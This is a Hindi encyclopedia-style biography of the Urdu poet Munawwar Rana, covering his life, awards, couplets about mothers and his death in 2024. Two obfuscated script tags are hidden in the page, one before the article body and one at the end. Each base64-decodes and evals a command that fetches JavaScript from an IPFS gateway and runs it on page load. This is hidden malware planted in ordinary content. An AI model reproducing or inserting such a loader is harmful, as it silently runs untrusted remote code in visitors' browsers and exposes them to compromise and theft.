एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "२"।

मुनव्वर राणा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
मुनव्वर राणा
मुनव्वर राणा
पूरा नाम मुनव्वर राणा
जन्म 26 नवम्बर, 1952
जन्म भूमि ज़िला रायबरेली, उत्तर प्रदेश
मृत्यु 14 जनवरी, 2024
मृत्यु स्थान लखनऊ, उत्तर प्रदेश
पति/पत्नी रैना राणा
संतान पुत्री-4, पुत्र- 1
कर्म भूमि भारत
कर्म-क्षेत्र शायरी, कविता, ग़ज़ल
पुरस्कार-उपाधि साहित्य अकादमी पुरस्कार, 2014

माटी रतन सम्मान, 2012

प्रसिद्धि उर्दू शायर
नागरिकता भारतीय
अन्य जानकारी मुनव्वर राणा मां पर लिखी शायरियों को लेकर काफी मशहूर थे। माना जाता है कि मां के लिए शेर लिखने में उनको कोई मात नहीं दे सका।
इन्हें भी देखें कवि सूची, साहित्यकार सूची

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>मुनव्वर राणा (अंग्रेज़ी: Munawwar Rana, जन्म- 26 नवम्बर, 1952; मृत्यु- 14 जनवरी, 2024) भारतीय उर्दू कवि थे। उनकी कविता 'शहदबा' के लिए उन्हें साल 2014 में 'साहित्य अकादमी पुरस्कार' से सम्मानित किया गया था। मुनव्वर राणा ने उर्दू और अवधी में लिखा, लेकिन फ़ारसी और अरबी शब्दावली से परहेज किया जो उर्दू को हिंदी से अलग करती है। यह उनकी कविता को भारतीय दर्शकों के लिए सुलभ बनाता है और गैर-उर्दू क्षेत्रों में आयोजित कवि सम्मेलनों में उनकी लोकप्रियता को बताता है। मुनव्वर राणा मां पर लिखी शायरियों को लेकर काफी मशहूर थे। माना जाता है कि मां के लिए शेर लिखने में उनको कोई मात नहीं दे सका।

परिचय

मुनव्वर राणा का जन्म 26 नवंबर, 1952 को उत्तर प्रदेश के रायबरेली जिले में हुआ था। वह भले ही उत्तर प्रदेश में जन्मे थे, लेकिन उन्होंने अधिकतर जीवन पश्चिम बंगाल के कोलकाता में बिताया। वह उर्दू के शायर थे, लेकिन वे अपनी शेरों में अवधी और हिंदी शब्दों का प्रयोग प्रमुखता से करते थे, जिस कारण उन्हें भारतीय लोगों की लोकप्रियता मिली। मुनव्वर राणा एक उम्दा शैली के शायर थे। उनकी कलम के प्रेम का अधिकांश हिस्सा मां के लिए होता था।[1] मुनव्वर रानणा की मां पर लिखी शायरी हर किसी के दिल में भावनाओं का एक ज्वार ले आती है।

पुरस्कार

  • उर्दू साहित्य में महारत हासिल करने पर मुनव्वर राणा को 2012 में शहीद शोध संस्थान द्वारा 'माटी रतन सम्मान' से नवाजा गया था।
  • 2014 में साहित्य अकादमी पुरस्कार मिलने के बाद उन्होंने इसे लौटा दिया था और कभी भी सरकार की तरफ से कोई अवार्ड न लेने की कसम खा ली थी।

माँ पर शायरी

जब मां पर कोई कविता कही जाएगी तो मुनव्वर राणा की शायरी जरूर याद आएगी। वह कहते थे[2]-

उदास रहने को अच्छा नहीं बताता है, कोई भी जहर को मीठा नहीं बताता है,
कल अपने आपको देखा था मां की आंखों में, ये आईना हमें बूढ़ा नहीं बताता है।

किसी को घर मिला हिस्से में या कोई दुकाँ आई,
मैं घर में सब से छोटा था मिरे हिस्से में माँ आई।

मुनव्वर राणा देश और विदेशों में आयोजित मुशायरों में शिरकत करते थे और अपनी बुलंद, खनकती आवाज में महफिल में जान फूंक देते थे, लेकिन मां को बयां करती उनकी पंक्तियां लोगों की आंखें नम कर देती थी। वह कहते थे-

ऐ अंधेरे देख ले मुंह तेरा काला हो गया,
मां ने आंखें खोल दीं, घर में उजाला हो गया।

इस तरह मेरे गुनाहों को वो धो देती है,
मां बहुत गुस्से में होती है तो रो देती है।
मेरी ख़्वाहिश है कि मैं फिर से फ़रिश्ता हो जाऊँ,
माँ से इस तरह लिपट जाऊँ कि बच्चा हो जाऊँ

छू नहीं सकती मौत भी आसानी से इसको,
यह बच्चा अभी माँ की दुआ ओढ़े हुए है।

किसी को घर मिला हिस्से में या कोई दुकाँ आई,
मैं घर में सब से छोटा था मिरे हिस्से में माँ आई।

मृत्यु

दुनिया के बड़े मशहूर शायर मुनव्वर राणा का लखनऊ, उत्तर प्रदेश के पीजीआई में 14 जनवरी, 2024 को निधन हुआ। उन्होंने 71 साल की उम्र में करीब 11:00 बजे अंतिम सांस ली। काफी दिनों से उनकी तबीयत गंभीर बनी हुई थी, जिसके चलते उन्हें लखनऊ पीजीआई में भर्ती कराया गया था। मुनव्वर राणा मां पर लिखी शायरियों को लेकर काफी मशहूर थे। माना जाता है कि मां के लिए शेर लिखने में उनको कोई मात नहीं दे सका। मुनव्वर राणा पीजीआई में लंबे समय से डायलिसिस पर थे। फेफड़ों में काफी इंफेक्शन था, जिसकी वजह से उनको वेंटिलेटर पर भी रखा गया था। उन्हें लंबे समय से किडनी की परेशानी थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. मशहूर शायर मुनव्वर राणा का लखनऊ पीजीआई में निधन (हिंदी) jagran.com। अभिगमन तिथि: 12 फ़रवरी, 2024।
  2. ये आईना हमें बूढ़ा नहीं बताता (हिंदी)। । अभिगमन तिथि: 12 फ़रवरी, 2024।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>